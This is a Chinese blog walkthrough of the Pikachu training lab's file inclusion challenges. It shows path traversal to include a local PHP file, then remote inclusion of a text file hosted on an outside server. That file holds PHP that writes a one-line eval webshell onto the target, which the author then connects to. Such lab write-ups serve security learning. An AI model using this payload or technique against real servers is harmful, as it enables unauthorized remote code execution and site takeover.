当前位置: 首页 > article >正文

pikachu文件包含漏洞靶场通关攻略

本地文件包含

首先,在靶场根目录下创建一个php文件,内容是phpinfo();

其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下

然后,将filename的参数改为可以访问到我们创建的php文件的地址

../../../../2.php

就可以访问到我们的phpinfo

远程文件包含

在进行远程文件包含时,要先修改两个参数

php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉

(看自己是什么版本的PHP,要和版本对应)

进行任意图片提交

在云服务器上创建一个2.txt文件  内容是

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

就是创建一个shell.php 文件,文件内容为一句话木马

然后,将filename的参数改为我们2.txt的地址

http://47.121.191.208/2.txt

回车后就可以在fileinclude目录下找到我们上传的shell.php文件

接下来使用连接工具进行webshell连接,成功连接


http://www.kler.cn/a/290167.html

相关文章:

  • Flink CDC(SQL Client)连接 MySQL 数据库教程
  • 自动驾驶3D目标检测综述(一)
  • 期权懂|期权新手入门教学:期权合约有哪些要素?
  • 华为大咖说 | 浅谈智能运维技术
  • 速盾:cdn和反向代理的关系是什么?
  • 009_SSH_Mysql图书管理系统(学生注册 借书 还书 绵阳)——lwplus87(免费送)
  • 运维管理体系及其实践要点:为高效运维保驾护航
  • zabbix通过OMSA监控Dell服务器_zabbix dell http
  • 为什么我会有使用gradle,需要花长时间去下载依赖?使用maven就不会有这种感受?
  • c++ websocket简单讲解
  • 大势智慧携“实景三维+AI”信创产品体系亮相2024中国地理信息产业大会
  • 详解 HTTPS 与 TLS证书链校验
  • 避坑之:深信服AC跨三层取MAC(核心交换机是锐捷S7808C_RGOS 11.0(4)B2P1)
  • 实验室ICPR 2024论文分享┆DS MYOLO:一种基于状态空间模型的驾驶场景可靠目标检测器
  • Edge资源占用优化:调整浏览器设置与关闭自动更新检查
  • 工业主板在轨道交通中的应用特点
  • 【网络】P2P打洞原理
  • 专项练习-数据思维-49题
  • PostgreSQL技术内幕4:PostgreSQL存储引擎内存管理
  • 使用udp进行通信
  • 视频结构化从入门到精通——行为分析类应用
  • IEEE PDF eXpress 报错解决 Error in converting file + font not embedded
  • 海康二次开发学习笔记9-通讯触发及模块列表获取
  • LLM手撕
  • JS笔记
  • js逆向——RSA实战案例讲解